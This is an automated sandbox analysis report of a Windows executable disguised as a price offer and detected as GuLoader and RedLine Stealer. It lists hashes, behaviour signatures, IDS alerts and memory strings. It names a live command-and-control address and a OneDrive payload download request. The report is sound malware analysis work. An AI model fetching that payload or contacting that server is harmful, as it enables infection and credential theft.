Windows Analysis Report
Price Offer_1200R4 1200R20.exe

Overview

General Information

Sample name: Price Offer_1200R4 1200R20.exe
Analysis ID: 1472462
MD5: 4778e666c0776a614b0c3482a34874e7
SHA1: 94055440790747bd0247a15e21cb64e617c1f0fd
SHA256: 14f52da07995de5bd50d4ab4989741ffd5ced7f77b8c7e4c86f82939cebae8bc
Tags: exe
Infos:

Detection

GuLoader, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected RedLine Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe ReversingLabs: Detection: 31%
Source: Price Offer_1200R4 1200R20.exe ReversingLabs: Detection: 31%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Price Offer_1200R4 1200R20.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: Price Offer_1200R4 1200R20.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405A4F
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_00406620 FindFirstFileA,FindClose, 0_2_00406620
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Code function: 0_2_004027CF FindFirstFileA, 0_2_004027CF
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_00405A4F
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_00406620 FindFirstFileA,FindClose, 4_2_00406620
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_004027CF FindFirstFileA, 4_2_004027CF

Networking

barindex
Source: Traffic Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49740 -> 178.23.190.118:1912
Source: Traffic Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49740 -> 178.23.190.118:1912
Source: Traffic Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 178.23.190.118:1912 -> 192.168.2.4:49740
Source: Traffic Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 178.23.190.118:1912 -> 192.168.2.4:49740
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 178.23.190.118:1912
Source: Joe Sandbox View IP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox View ASN Name: LYNERO-ASDK LYNERO-ASDK
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /download?resid=F547EE3E8FFF6BF5%21682&authkey=!AAAtK601mA4WJes HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: onedrive.live.comCache-Control: no-cacheCookie: MUID=00C7A97535A662F221B7BAEA31A666AD
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.118
Source: global traffic HTTP traffic detected: GET /download?resid=F547EE3E8FFF6BF5%21682&authkey=!AAAtK601mA4WJes HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: onedrive.live.comCache-Control: no-cacheCookie: MUID=00C7A97535A662F221B7BAEA31A666AD
Source: global traffic DNS traffic detected: DNS query: onedrive.live.com
Source: global traffic DNS traffic detected: DNS query: gcwema.bn.files.1drv.com
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: Gastrostomize.exe, Gastrostomize.exe, 00000004.00000000.1821252336.000000000040A000.00000008.00000001.01000000.00000006.sdmp, Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Price Offer_1200R4 1200R20.exe, Gastrostomize.exe.1.dr String found in binary or memory: http://s.symcd.com06
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB66000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EB6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/D
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001EAD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id1
